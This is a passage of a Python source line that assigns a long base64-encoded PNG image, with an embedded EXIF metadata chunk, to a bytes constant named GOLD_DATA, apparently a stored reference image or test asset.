GOLD_DATA = b'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